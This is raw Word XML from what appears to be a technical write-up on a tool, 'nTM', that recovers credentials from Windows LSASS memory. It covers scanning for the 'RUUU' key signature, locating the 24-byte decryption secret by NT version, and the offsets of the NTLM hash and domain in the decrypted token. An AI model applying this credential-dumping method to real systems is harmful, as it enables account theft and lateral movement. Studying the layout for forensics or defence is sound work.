          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>8</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0x0023000c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>50 72 69 6d</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>'Prim'</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0x00230010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>61 72 79 00</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>'ary',0</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 xml:space="preserve">0x00230014  xx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ab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Everything below this is encrypted</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 xml:space="preserve">0x00230018  xx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ab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</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 xml:space="preserve">0x0023001c  xx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ab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRPr="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0x00230020  xx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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="005405D3">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>32</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">At offset 0, we have a DWORD which is an address, 0x0023000c. This address </w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>points to the 'Primary' string. These two conditions imply that at 0x00230014</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>we have an encrypted token. The encrypted buffer after the 'Primary' string contains sensitive session information, it is 0x70 in size.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">If the local machine is Windows XP, then a call to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LsaEncryptMemory</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(...) is </w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sufficient to decrypt the token. In Windows Vista+, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> library creates </w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>handles to its symmetric keys, which will be difficult to locate. Fortunately,</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft keeps the secret, a 24-byte value, which can be used to generate a new</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">symmetric key, in memory. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reads all pages allocated with MEM_PRIVATE for a DWORD value of 0x55555552,</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>or RUUU. Here is an example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pP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004B0000  00000014 0</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004B0004  55555552 4</w:t>
      </w:r>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Our initial string, RUUU (0x55555552)</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004B0008  0028C2C8 8</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004B000C  004B0020 12</w:t>
      </w:r>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>This value must point to offset 32 (0x20)</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004B0010  00000000 16</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004B0014  00000000 20</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004B0018  00000000 24</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lastRenderedPageBreak/>
        <w:t>004B001C  00000000 28</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004B0020  000001BC 32</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004B0024  4D53534B 36</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004B0028  00010005 40</w:t>
      </w:r>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>This value must be 0x00010005</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004B002C  00000001 44</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004B0030  00000008 48</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004B0034  000000A8 52</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004B0038  00000018 56</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004B003C  0F27E30C 60</w:t>
      </w:r>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>If all above values are true, then this is the secret</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004B0040  7CDC1A74 64</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004B0044  BDB3B630 68</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004B0048  BAF548FC 72</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004B004C  D65DD841 76</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004B0050  822470E1 80</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004B0054  5424C874 84</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRPr="001D55BA" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>004B0058  4FC1460A 88</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001D55BA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>004B005C  1450C4A0 92</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005405D3" w:rsidRDefault="005405D3" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>In NT6.1, the key is located at 0x3c relative to -0x04 of 'RUUU'. In NT6.0,</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the same thing applies except the key is located at 0x2c. In both cases, the</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>key is 24 bytes in length. The key cannot contain a NULL byte, this is checked by</w:t>
      </w:r>
      <w:r w:rsidR="001D55BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>LSASS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F0736" w:rsidRDefault="006F0736" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc347394090"/>
      <w:r>
        <w:t>Decrypted Token</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  identifies several important offsets in the decrypted token:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00A320AF" w:rsidP="00551FAB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>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007B05B8  0D614380  €Ca.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>00</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Base (after 'Primary')</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007B05BC  97AD4B10  K­—</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>04</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007B05C0  00140012  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>08</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007B05C4  00000060  `...</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Offset to user name</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007B05C8  54AC2B04  .+¬T</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>Session hash (16 bytes)</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007B05CC  B3A514EE  î.¥³</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>20</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007B05D0  80B5DE4F  OÞµ€</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>24</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007B05D4  BA724A5B  [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Jr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>º</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>28</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007B05D8  00000000  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>NTLM hash (16 bytes)</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007B05DC  00000000  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>36</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007B05E0  00000000  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>40</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007B05E4  00000000  ....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>44</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007B05E8  2BE4A824  $¨ä+</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>48</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007B05EC  A8F30F8B  ‹ó¨.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>52</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007B05F0  DEBAD772  r×ºÞ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>56</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007B05F4  A9353879  y85©</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>60</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 xml:space="preserve">007B05F8  FA4BE8F6  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>öèKú</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>64</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 xml:space="preserve">007B05FC  00010001 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>....</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>68</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007B0600  004F004C  L.O.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>72</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Offset 72 is always the domain in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wchar_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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007B0604  00410043  C.A.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>76</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007B0608  0044004C  L.D.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320AF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>80</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007B060C  004D004F  O.M.</w:t>
      </w:r>
